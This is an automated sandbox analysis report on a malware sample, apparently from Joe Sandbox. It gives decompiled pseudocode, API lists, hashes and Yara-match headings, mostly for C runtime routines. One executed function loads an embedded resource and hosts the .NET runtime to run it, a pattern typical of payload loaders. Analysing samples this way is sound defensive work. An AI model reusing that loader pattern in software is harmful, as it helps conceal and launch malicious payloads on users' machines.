                                        • API String ID: 3567560977-0
                                        • Opcode ID: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction ID: 11304d4fe9ea5885aab4587ac3a0492065e43b777ef5c1896b8c4a878036415c
                                        • Opcode Fuzzy Hash: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction Fuzzy Hash: ADF09032A197131DF2757A79BC0A7CE2AECBF92630B204A6AF4D4D90C4FF3984418294
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t10;
                                        				signed int _t12;
                                        				intOrPtr* _t16;
                                        				intOrPtr* _t31;
                                        				void* _t32;
                                        
                                        				_push(8);
                                        				_push(0x107cf60);
                                        				_t10 = E010627F0(__ebx, __edi, __esi);
                                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                                        				if(_t31 != 0) {
                                        					_t12 = E01063117(0xd);
                                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                        					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
                                        							E010632B6( *((intOrPtr*)(_t31 + 4)));
                                        						}
                                        					}
                                        					 *(_t32 - 4) = 0xfffffffe;
                                        					E01068DC1();
                                        					if( *_t31 != 0) {
                                        						E01063117(0xc);
                                        						 *(_t32 - 4) = 1;
                                        						E0106363B( *_t31);
                                        						_t16 =  *_t31;
                                        						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
                                        							E010634E1(_t16);
                                        						}
                                        						 *(_t32 - 4) = 0xfffffffe;
                                        						E01068DCD();
                                        					}
                                        					_t10 = E010632B6(_t31);
                                        				}
                                        				return E01062835(_t10);
                                        			}

                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction ID: 205b0c7eafba4a618c5dd71e5056d29ef6abffd32cd48716cb0339ad8747cd66
                                        • Opcode Fuzzy Hash: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction Fuzzy Hash: A7019231542706DAEBB9BB68D844798B7EC6F30721F24858EE5E86E1D0DF748580C664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID:
                                        • API String ID: 3509577899-0
                                        • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction ID: ba12d05f766bd89723834d416a93fcf7bd807e6db9d38219fbf719da127f4fb7
                                        • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction Fuzzy Hash: 3D51B173618216ABEB25BF68CC80EBF7BF9EB54650F2546A8EEC4D6144EB34DC40C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t20;
                                        				long _t31;
                                        
                                        				if(_a4 != 0) {
                                        					_t31 = _a8;
                                        					__eflags = _t31;
                                        					if(_t31 != 0) {
                                        						_push(__ebx);
                                        						while(1) {
                                        							__eflags = _t31 - 0xffffffe0;
                                        							if(_t31 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								_t31 = _t31 + 1;
                                        								__eflags = _t31;
                                        							}
                                        							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
                                        							_t20 = _t7;
                                        							__eflags = _t20;
                                        							if(_t20 != 0) {
                                        								L17:
                                        								_t8 = _t20;
                                        							} else {
                                        								__eflags =  *0x10c0a40 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E01064196(__eflags);
                                        									 *_t9 = E010641EF(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E0106455B(_t7, _t31);
                                        									if(__eflags == 0) {
                                        										_t12 = E01064196(__eflags);
                                        										 *_t12 = E010641EF(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E0106455B(_t6, _t31);
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E010632B6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E0106596C(__ebx, __edx, __edi, _a8);
                                        				}
                                        			}










                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				int _v20;
                                        				int _t35;
                                        				int _t38;
                                        				intOrPtr* _t44;
                                        				int _t47;
                                        				short* _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr _t54;
                                        				int _t55;
                                        				int _t59;
                                        				char* _t62;
                                        
                                        				_t62 = _a8;
                                        				if(_t62 == 0) {
                                        					L5:
                                        					return 0;
                                        				}
                                        				_t50 = _a12;
                                        				if(_t50 == 0) {
                                        					goto L5;
                                        				}
                                        				if( *_t62 != 0) {
                                        					E010637C4( &_v20, _a16);
                                        					_t35 = _v20;
                                        					__eflags =  *(_t35 + 0xa8);
                                        					if( *(_t35 + 0xa8) != 0) {
                                        						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							__eflags = _a4;
                                        							_t59 = 1;
                                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                        							if(__eflags != 0) {
                                        								L21:
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t31 = _t54 + 0x70;
                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t31;
                                        								}
                                        								return _t59;
                                        							}
                                        							L20:
                                        							_t44 = E01064196(__eflags);
                                        							_t59 = _t59 | 0xffffffff;
                                        							__eflags = _t59;
                                        							 *_t44 = 0x2a;
                                        							goto L21;
                                        						}
                                        						_t59 = _v20;
                                        						__eflags =  *(_t59 + 0x74) - 1;
                                        						if( *(_t59 + 0x74) <= 1) {
                                        							L15:
                                        							__eflags = _t50 -  *(_t59 + 0x74);
                                        							L16:
                                        							if(__eflags < 0) {
                                        								goto L20;
                                        							}
                                        							__eflags = _t62[1];
                                        							if(__eflags == 0) {
                                        								goto L20;
                                        							}
                                        							L18:
                                        							_t59 =  *(_t59 + 0x74);
                                        							goto L21;
                                        						}
                                        						__eflags = _t50 -  *(_t59 + 0x74);
                                        						if(__eflags < 0) {
                                        							goto L16;
                                        						}
                                        						__eflags = _a4;
                                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                        						_t59 = _v20;
                                        						__eflags = _t47;
                                        						if(_t47 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t55 = _a4;
                                        					__eflags = _t55;
                                        					if(_t55 != 0) {
                                        						 *_t55 =  *_t62 & 0x000000ff;
                                        					}
                                        					_t59 = 1;
                                        					goto L21;
                                        				}
                                        				_t49 = _a4;
                                        				if(_t49 != 0) {
                                        					 *_t49 = 0;
                                        				}
                                        				goto L5;
                                        			}

















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t24;
                                        				void* _t28;
                                        				intOrPtr* _t40;
                                        				void* _t41;
                                        
                                        				_push(0xc);
                                        				_push(0x107cf38);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				_t28 = E010615FE();
                                        				_t40 = E010632EE(8, 1);
                                        				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                        				_t43 = _t40;
                                        				if(_t40 != 0) {
                                        					E010636DB(_t28, __edx, 1, _t40, __eflags);
                                        					E01063AF6(_t28, __edx, 1, _t40, __eflags);
                                        					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                        					E01063117(0xc);
                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        					E0106344C( *_t40);
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E70();
                                        					E01063117(0xd);
                                        					 *(_t41 - 4) = 1;
                                        					asm("lock xadd [eax], edi");
                                        					__eflags = 2;
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E7C();
                                        					_t24 = _t40;
                                        				} else {
                                        					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
                                        					_t24 = 0;
                                        				}
                                        				return E01062835(_t24);
                                        			}








                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: a8f8b39b4fd8b99086203ddb97aabe85cbe9bf1f90d227263d62553b714ea46d
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01082892
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 01082897
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108289C
                                          • Part of subcall function 01082AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 01082AC2
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 010828B1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: b1c52812ca530411cef9d31a1f07505b78d713714c0642a0fdd6fa815063bdab
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: F3C04C3842D223D22C713E7422101ED77404CB269878620C29CC2175038E05410BD433
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: X&A$h&A
                                        • API String ID: 3903695350-2460073903
                                        • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction ID: c89599ffa752a7419cc6ed1d924e3923b80d600b097e28779840c888ba2b925a
                                        • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction Fuzzy Hash: EB319E71A08602DFEB71BA78D844B9BB7F8BF10310F114A69E4D9D7190EF32E8958B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        C-Code - Quality: 100%
                                        			E00401489() {
                                        				void* _v8;
                                        				struct HRSRC__* _t4;
                                        				long _t10;
                                        				struct HRSRC__* _t12;
                                        				void* _t16;
                                        
                                        				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                        				_t12 = _t4;
                                        				if(_t12 == 0) {
                                        					L6:
                                        					ExitProcess(0);
                                        				}
                                        				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                        				if(_t16 != 0) {
                                        					_v8 = LockResource(_t16);
                                        					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                        					_t13 = _v8;
                                        					if(_v8 != 0 && _t10 != 0) {
                                        						L00401000(_t13, _t10); // executed
                                        					}
                                        				}
                                        				FreeResource(_t16);
                                        				goto L6;
                                        			}









                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                          • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                        • ExitProcess.KERNEL32 ref: 004014EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                        • String ID: v4.0.30319
                                        • API String ID: 2372384083-3152434051
                                        • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                        • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401E1D() {
                                        				_Unknown_base(*)()* _t1;
                                        
                                        				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                        				return _t1;
                                        			}





                                        APIs
                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                        • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                        • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004055C5(void* __ecx) {
                                        				void* _t6;
                                        				void* _t14;
                                        				void* _t18;
                                        				WCHAR* _t19;
                                        
                                        				_t14 = __ecx;
                                        				_t19 = GetEnvironmentStringsW();
                                        				if(_t19 != 0) {
                                        					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                        					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                        					_t18 = _t6;
                                        					if(_t18 != 0) {
                                        						E0040ACF0(_t18, _t19, _t12);
                                        					}
                                        					E00403E03(0);
                                        					FreeEnvironmentStringsW(_t19);
                                        				} else {
                                        					_t18 = 0;
                                        				}
                                        				return _t18;
                                        			}








                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: EnvironmentStrings$Free
                                        • String ID:
                                        • API String ID: 3328510275-0
                                        • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                        • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                        • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                        • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
                                        				void* _t8;
                                        				void* _t12;
                                        				signed int _t13;
                                        				void* _t15;
                                        				signed int _t18;
                                        				long _t19;
                                        
                                        				_t15 = __ecx;
                                        				_t18 = _a4;
                                        				if(_t18 == 0) {
                                        					L2:
                                        					_t19 = _t18 * _a8;
                                        					if(_t19 == 0) {
                                        						_t19 = _t19 + 1;
                                        					}
                                        					while(1) {
                                        						_t8 = RtlAllocateHeap( *0x4132b0, 8, _t19); // executed
                                        						if(_t8 != 0) {
                                        							break;
                                        						}
                                        						__eflags = E00403829();
                                        						if(__eflags == 0) {
                                        							L8:
                                        							 *((intOrPtr*)(E00404831())) = 0xc;
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						_t12 = E004068FD(_t15, __eflags, _t19);
                                        						_pop(_t15);
                                        						__eflags = _t12;
                                        						if(_t12 == 0) {
                                        							goto L8;
                                        						}
                                        					}
                                        					return _t8;
                                        				}
                                        				_t13 = 0xffffffe0;
                                        				if(_t13 / _t18 < _a8) {
                                        					goto L8;
                                        				}
                                        				goto L2;
                                        			}










                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
